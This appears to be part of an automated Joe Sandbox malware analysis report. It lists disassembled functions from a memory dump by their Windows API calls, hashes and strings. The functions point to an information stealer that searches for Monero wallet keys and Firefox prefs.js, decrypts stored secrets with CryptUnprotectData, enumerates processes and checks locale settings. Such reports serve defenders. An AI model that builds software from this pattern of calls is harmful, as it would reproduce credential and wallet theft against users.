                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s
                    • API String ID: 180737720-4073750446
                    • Opcode ID: f371cfb9a96fdd8b6a16076b56890c7b6ecb5e22ae64201bfda9fc796562259b
                    • Instruction ID: 0ae97cde06227abe8a5e156c2689f9517c932902129a64a4dbd54c0765aa2c26
                    • Opcode Fuzzy Hash: f371cfb9a96fdd8b6a16076b56890c7b6ecb5e22ae64201bfda9fc796562259b
                    • Instruction Fuzzy Hash: 925101B2900218ABCB25EBA0DC45FFA737CBB58700F40458DB65DD6140EB75AB89DF52
                    APIs
                    • wsprintfA.USER32 ref: 003BED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 003BED55
                    • StrCmpCA.SHLWAPI(?,003D1538), ref: 003BEDAB
                    • StrCmpCA.SHLWAPI(?,003D153C), ref: 003BEDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BF2AE
                    • FindClose.KERNEL32(000000FF), ref: 003BF2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: f088188a00a4f208c9097435934d6be68dc08b800b660a0091884ba675d2bf85
                    • Instruction ID: e18af265c2f1ec67bab2880a0eacd616d4fe1e4fea6df826672053ea7d1ba6e4
                    • Opcode Fuzzy Hash: f088188a00a4f208c9097435934d6be68dc08b800b660a0091884ba675d2bf85
                    • Instruction Fuzzy Hash: 8DE12D7281161C9BDB16EB60DC52FEE7738AF54304F40419DB50AAA092EF306F8ADF52
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D15B8,003D0D96), ref: 003BF71E
                    • StrCmpCA.SHLWAPI(?,003D15BC), ref: 003BF76F
                    • StrCmpCA.SHLWAPI(?,003D15C0), ref: 003BF785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BFAB1
                    • FindClose.KERNEL32(000000FF), ref: 003BFAC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
                    • Opcode ID: d77bf2dd91b21de5e53ade630d45d31a2a7379041993d4651e10308a2dce8628
                    • Instruction ID: 9b3ce9b5916bb5da73f4bc6c4d89b1e6ede926bbbecb6a168e0fc834dddccf87
                    • Opcode Fuzzy Hash: d77bf2dd91b21de5e53ade630d45d31a2a7379041993d4651e10308a2dce8628
                    • Instruction Fuzzy Hash: 2CB14E719006089BCB26EB60DC96FEE7779AF54304F4085ADA50ADA181EF306F49CF92
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D510C,?,?,?,003D51B4,?,?,00000000,?,00000000), ref: 003B1923
                    • StrCmpCA.SHLWAPI(?,003D525C), ref: 003B1973
                    • StrCmpCA.SHLWAPI(?,003D5304), ref: 003B1989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003B1D40
                    • DeleteFileA.KERNEL32(00000000), ref: 003B1DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003B1E20
                    • FindClose.KERNEL32(000000FF), ref: 003B1E32
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: c2bb70d07bbc9d17438b48187ff79eafbe1f4ae75f6f7936575228da11740e48
                    • Instruction ID: 7ea48e0572a445ec50f9ca73c0fe291525833055e0d230af46d4738ac5b1cf1b
                    • Opcode Fuzzy Hash: c2bb70d07bbc9d17438b48187ff79eafbe1f4ae75f6f7936575228da11740e48
                    • Instruction Fuzzy Hash: C612EE7191061C9BDB16EB60DC96FEE7778AF54304F40419DA10AEA091EF306F89DF92
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003D0C2E), ref: 003BDE5E
                    • StrCmpCA.SHLWAPI(?,003D14C8), ref: 003BDEAE
                    • StrCmpCA.SHLWAPI(?,003D14CC), ref: 003BDEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BE3E0
                    • FindClose.KERNEL32(000000FF), ref: 003BE3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: \*.*
                    • API String ID: 2325840235-1173974218
                    • Opcode ID: 374e26a5d3b506e7683b6e735074abf2eed36ba0d87a9638a2854f8bc3d0ebb2
                    • Instruction ID: a7e08904b4a463a82633a1d093aebe47f33c9bef258e4caeb95074b0ad303125
                    • Opcode Fuzzy Hash: 374e26a5d3b506e7683b6e735074abf2eed36ba0d87a9638a2854f8bc3d0ebb2
                    • Instruction Fuzzy Hash: ABF19E7181061C9BDB26EB60DC96FEE7778BF14304F80419EA50AA6091EF346F4ADF52
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D14B0,003D0C2A), ref: 003BDAEB
                    • StrCmpCA.SHLWAPI(?,003D14B4), ref: 003BDB33
                    • StrCmpCA.SHLWAPI(?,003D14B8), ref: 003BDB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BDDCC
                    • FindClose.KERNEL32(000000FF), ref: 003BDDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 86cace7791b372a25051bb73a751fe6802db339c7780d0e87aff07b2643d6853
                    • Instruction ID: 8f44192cde8f0c59372748a14491a97c52430196df6c574d0fe639ab145f8337
                    • Opcode Fuzzy Hash: 86cace7791b372a25051bb73a751fe6802db339c7780d0e87aff07b2643d6853
                    • Instruction Fuzzy Hash: 5791237290060897CB16FBB0EC56EED777DAB94308F40855DF90ADA541EE349F09CB92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: >ZI$Au8D$B}7_$J9H)$al1i$p,[m$r:?}$w6m${3
                    • API String ID: 0-3651634773
                    • Opcode ID: 46a663db050d81775c4d6cc140fe4a4c2eeea916375f7500fb568de1ef805144
                    • Instruction ID: 13ea682af6de5bf93b4d65a2c6d0de3f63e28bdac752db2fefc5c9bc41252879
                    • Opcode Fuzzy Hash: 46a663db050d81775c4d6cc140fe4a4c2eeea916375f7500fb568de1ef805144
                    • Instruction Fuzzy Hash: 79A2E6F360C2049FE304AE2DEC8567ABBE9EF94720F1A493DE6C4C3744E67598058697
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,003D05AF), ref: 003C7BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 003C7BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 003C7C0D
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003C7C62
                    • LocalFree.KERNEL32(00000000), ref: 003C7D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: 9c655ba18acc895f1b9b084cf76610ece96482c25c522f936abb988cd8b772e1
                    • Instruction ID: 17cf1d60a44c48f23c615e98031716b4f6528423e101a471ed6c012bb636206c
                    • Opcode Fuzzy Hash: 9c655ba18acc895f1b9b084cf76610ece96482c25c522f936abb988cd8b772e1
                    • Instruction Fuzzy Hash: FB415D7194021CABCB25DB94DC99FEEB7B8FF54704F204199E40AA6290DB742F85CFA1
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003D0D73), ref: 003BE4A2
                    • StrCmpCA.SHLWAPI(?,003D14F8), ref: 003BE4F2
                    • StrCmpCA.SHLWAPI(?,003D14FC), ref: 003BE508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BEBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 433455689-1173974218
                    • Opcode ID: 5463269557e8bc0ea8c69c04cee98bbc8f54d0a7a486fe20a4f8bd6155537c53
                    • Instruction ID: cae9fdf192c7f3fac64f1f8c94414325effafbf5df59591fd10dfd917382d9fc
                    • Opcode Fuzzy Hash: 5463269557e8bc0ea8c69c04cee98bbc8f54d0a7a486fe20a4f8bd6155537c53
                    • Instruction Fuzzy Hash: AC124C7290061C9BDB1AFB60DC96FED7378AF54304F4041ADA50ADA191EF346F49CBA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ,&f{$0{V^$A9y$X8y$f4^,$]f
                    • API String ID: 0-16138498
                    • Opcode ID: 59263fd4371b8478f75a63fd84c0d92b0f191380ab18ab05c1b0129fa801a2a3
                    • Instruction ID: 2051c73aac7e21bf91dfc4fc7bc053037dadb05c9097d81ef8f275c5f2d43a0d
                    • Opcode Fuzzy Hash: 59263fd4371b8478f75a63fd84c0d92b0f191380ab18ab05c1b0129fa801a2a3
                    • Instruction Fuzzy Hash: F0B2E4B390C2149FE304BE29DC8567AF7E9EF94760F1A492DEAC5C3744EA3598008797
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: /*@;$3^w$4"?$a6;o$e>{_$n|Wl
                    • API String ID: 0-457620451
                    • Opcode ID: 813252cfad1f20108e4836803d2c693068b0bd7c523ee7981cdb03d39c468810
                    • Instruction ID: db3e8e3a464158f414779f006a1105cf0abc2ef546fccb0bfa5e4d98c3be10ba
                    • Opcode Fuzzy Hash: 813252cfad1f20108e4836803d2c693068b0bd7c523ee7981cdb03d39c468810
                    • Instruction Fuzzy Hash: 67B216F3A0C2049FE3046F2DEC8567AB7E9EB94720F1A4A3DE6C5C3344EA7558118697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 2Yv$rlw$ted Kingdom.$"3$L_^$X_w
                    • API String ID: 0-3489168069
                    • Opcode ID: 4204476cadcf46c8876682667f5e3f4759a07ea9d60374c1fc51e4e25f8d5556
                    • Instruction ID: bba96bc01206afde4753c353c37e38a957882d79d055f401970d23c70509b863
                    • Opcode Fuzzy Hash: 4204476cadcf46c8876682667f5e3f4759a07ea9d60374c1fc51e4e25f8d5556
                    • Instruction Fuzzy Hash: 9EB23AF3A0C2049FE704AE2DEC8577ABBE5EF94320F1A463DEAC5D3744E63558018696
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                    • LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID: N;
                    • API String ID: 4291131564-1002446643
                    • Opcode ID: b0294fdd27bebf49439c40c05f689623e5bb39f827b5152a9bab11e3b2faf213
                    • Instruction ID: 93ea7029b0fedafe253c75bf2e29026be616577140272f261b31caf22be047ee
                    • Opcode Fuzzy Hash: b0294fdd27bebf49439c40c05f689623e5bb39f827b5152a9bab11e3b2faf213
                    • Instruction Fuzzy Hash: EE11AFB4240308EFEB10CF64DC95FAA77B5FB89704F208059FA199B390C7B6A901DB91
                    APIs
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003BC871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003BC87C
                    • lstrcat.KERNEL32(?,003D0B46), ref: 003BC943
                    • lstrcat.KERNEL32(?,003D0B47), ref: 003BC957
                    • lstrcat.KERNEL32(?,003D0B4E), ref: 003BC978
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlen
                    • String ID:
                    • API String ID: 189259977-0
                    • Opcode ID: de62b09b6814789d2acf1a74ed3d7bf2dbbf10feeca26506ef58a6163db86390
                    • Instruction ID: b5efc5a308fca6e084428f243ad2750edd09b5e1798cfa5adfeb2dc3d389bca2
                    • Opcode Fuzzy Hash: de62b09b6814789d2acf1a74ed3d7bf2dbbf10feeca26506ef58a6163db86390
                    • Instruction Fuzzy Hash: BF41A2B5D0420ADFDB10CFA0DC89BFEB7B8BB48704F1045A9E509E6280D7749A84CF92
                    APIs
                    • GetSystemTime.KERNEL32(?), ref: 003C696C
                    • sscanf.NTDLL ref: 003C6999
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003C69B2
                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003C69C0
                    • ExitProcess.KERNEL32 ref: 003C69DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$System$File$ExitProcesssscanf
                    • String ID:
                    • API String ID: 2533653975-0
                    • Opcode ID: ac216c0b4e59a73d36cf6312bf1f61f05a167422172e41d5c128fb3d37db00fb
                    • Instruction ID: 3e3166f1be83cf63d12d0a943f16e6e5b5e4db1bbadbc4c54f34334badb515a0
                    • Opcode Fuzzy Hash: ac216c0b4e59a73d36cf6312bf1f61f05a167422172e41d5c128fb3d37db00fb
                    • Instruction Fuzzy Hash: 5321BAB5D14208ABCF05EFE4D945EEEB7B5BF58300F04852EE40AE3250EB745609DBA6
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003B724D
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003B7254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003B7281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003B72A4
                    • LocalFree.KERNEL32(?), ref: 003B72AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    • Opcode ID: b5a1342ac4747e14881cf220eeae5fc8223c4974fd82d33b277313065604771e
                    • Instruction ID: 7b0344d177731566c31b410a3b4cf4363b15ab9ef9c4f30f4222abd0fcd7c18a
                    • Opcode Fuzzy Hash: b5a1342ac4747e14881cf220eeae5fc8223c4974fd82d33b277313065604771e
                    • Instruction Fuzzy Hash: 620152B5A40208BBEB14DFE4CD49FAD7778EB44B04F104455FB09EB2C0C6B4AA04DB66
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C961E
                    • Process32First.KERNEL32(003D0ACA,00000128), ref: 003C9632
                    • Process32Next.KERNEL32(003D0ACA,00000128), ref: 003C9647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 003C965C
                    • CloseHandle.KERNEL32(003D0ACA), ref: 003C967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: d421f4625f9ebf5b5b412f00118d855793a9ba9e59c7bd52ce87995e3f680fd7
                    • Instruction ID: 2287f26e9c57474498a25ce06033287e39e502ad89ce26b2fb82101aa2c18adf
                    • Opcode Fuzzy Hash: d421f4625f9ebf5b5b412f00118d855793a9ba9e59c7bd52ce87995e3f680fd7
                    • Instruction Fuzzy Hash: 160129B5A00208ABCB11DFA5CC48FEDB7F8EB18350F004189A909D7280D774AE54DF52
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: :vy$,Jw$wFk$|'_
                    • API String ID: 0-1627011548
                    • Opcode ID: 9da0da3c87029cc624f722566eafb916dce041416521e467a893faca6012c89c
                    • Instruction ID: 160c246a17c0dd4cb72066807b894e8d825d9c4b2280e885602c3323206bf18a
                    • Opcode Fuzzy Hash: 9da0da3c87029cc624f722566eafb916dce041416521e467a893faca6012c89c
                    • Instruction Fuzzy Hash: 49B217F3A0C2149FE3046E2DEC8567AFBE9EF94320F1A493DEAC4C3744E67558058696
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: &N3$nz>$}N*$^{Q
                    • API String ID: 0-681066692
                    • Opcode ID: b73a3fb96db0633f99931f63c0ee10204e51ec2250fe7964b7d29ada00d1ebd2
                    • Instruction ID: 846c81a2d8baa8077b14bfdf8744df2ac0ee62e35e95b5f89fae5e37084d100d
                    • Opcode Fuzzy Hash: b73a3fb96db0633f99931f63c0ee10204e51ec2250fe7964b7d29ada00d1ebd2
                    • Instruction Fuzzy Hash: 44B228F3A0C2049FE7046E2DEC8567AFBE9EF94620F1A493DEAC4C7744E97558018683
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,003B5184,40000001,00000000,00000000,?,003B5184), ref: 003C8EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    • Opcode ID: 5df83ece443cdcf1ba8012e2d24e82cac3a8121cc01b4af6f2a0b78490204729
                    • Instruction ID: 45874cb25dfa6948ca599de24d5eb8488e7d7696a26d1e11297adf3d7869b699
                    • Opcode Fuzzy Hash: 5df83ece443cdcf1ba8012e2d24e82cac3a8121cc01b4af6f2a0b78490204729
                    • Instruction Fuzzy Hash: 9D11F2B0200208AFDB01CF64E884FAA37A9AF89354F10945CF919CB250DB75EE41EB61
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0118F370,00000000,?,003D0E10,00000000,?,00000000,00000000), ref: 003C7A63
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C7A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0118F370,00000000,?,003D0E10,00000000,?,00000000,00000000,?), ref: 003C7A7D
                    • wsprintfA.USER32 ref: 003C7AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    • Opcode ID: 01f959b6c8faf8de0bf67fbf4225dc58baf8eb8aded2842216fe98908545cae4
                    • Instruction ID: 26909fb9923104ca2eae302bf0679f1fb2c6c100bfc5999f162ecff1e5d280c1
                    • Opcode Fuzzy Hash: 01f959b6c8faf8de0bf67fbf4225dc58baf8eb8aded2842216fe98908545cae4
                    • Instruction Fuzzy Hash: DB115EB1D45218EBEB209B54DC49FA9B778FB04761F10439AE91AD32C0D7785E44CF52
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: K~v$O!p}$n.~_
                    • API String ID: 0-3894994114
                    • Opcode ID: f0c09d64e855683e84658af23b498f249b664dc64df5b1d9d8fe76d05bdd5d57
                    • Instruction ID: 06902b9079e14b131a6edceae04e718bbab1aa6f74d21c001265d5e6abe65898
                    • Opcode Fuzzy Hash: f0c09d64e855683e84658af23b498f249b664dc64df5b1d9d8fe76d05bdd5d57
